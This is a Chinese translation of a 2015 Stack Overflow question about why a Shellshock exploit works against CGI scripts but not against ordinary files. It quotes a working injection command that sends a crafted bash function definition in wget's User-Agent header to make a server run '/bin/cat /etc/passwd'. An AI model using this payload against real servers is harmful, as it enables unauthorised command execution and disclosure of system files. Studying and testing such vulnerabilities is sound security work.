我一直试图利用我的系统中的Shell休克漏洞,并遇到了一个有趣的问题。我一直在使用'wget‘来利用这个漏洞。我使用的命令如下:
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://somesite.com/some-script.cgi使用上面的命令,该漏洞将如预期的那样显示。但是,当我尝试获取一个不是.cgi文件的文件时,该漏洞将不会出现,并且只会下载该文件。
据我所知,wget应该将用户代理字符串设置为在命令中传递的值,该值应该运行代码/bin/cat /etc/passwd,而我不知道这与下载的文件的性质有什么关系。
提前谢谢。
发布于 2015-11-16 00:19:40
https://stackoverflow.com/questions/33725467
复制相似问题